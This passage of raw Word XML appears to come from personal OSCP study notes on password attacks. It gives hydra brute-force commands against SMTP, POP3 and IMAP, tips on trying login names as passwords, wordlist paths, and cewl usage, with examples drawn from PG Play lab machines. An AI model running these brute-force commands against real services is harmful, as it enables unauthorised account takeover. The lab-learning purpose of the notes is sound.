          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try login name as password (so: michael:michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ try reversed login name as password (so: michael:leahcim)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId363">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Stapler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, the "reverse" login name as password ended up being the way into FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mail (SMTP, POP3, IMAP):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt -e nsr smtp://target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt -e nsr pop3://target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt -e nsr imap://target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verbose:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-V</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the start for more verbose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012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D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5z8aqcxmhn1z" w:id="157"/>
      <w:bookmarkEnd w:id="157"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wordlists</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a reddit post about wordlists, which is an interesting topic since you don't want to miss an attack vector due to using wrong wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The OP of post made this cool looking tool called </w:t>
      </w:r>
      <w:hyperlink r:id="rId364">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ipcrawler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which recommended wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A lot of people agree that this is enough tho:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="967"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raft directory lists for dirbusting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="967"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">top1million for subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="967"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rockyou for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raft for Files AND Directories:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>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t xml:space="preserve">Raft for Directories:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt</w:t>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t xml:space="preserve">Top1Million for Subdomains:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.tx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirb/others/names.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 15.1.2. RDP for Password attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001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F6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_81ekjdjuwkj" w:id="158"/>
      <w:bookmarkEnd w:id="158"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a login page and brute force isn't working, then try making a username wordlist of stuff like root, admin, and the name of the service, and then for the password list use cewl. This is what they did in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId365">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GlasgowSmile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl http://192.168.190.79/joomla/administrator/ -d 4 -m 5 -w cewl2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d 4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-: means depth to spider to, more depth returns better results,default is 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : maximum word count </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : write output to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--url</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : target url (uhh, I don't see it being used here though. Maybe a typo on writeup)</w:t>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t xml:space="preserve">As seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId366">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
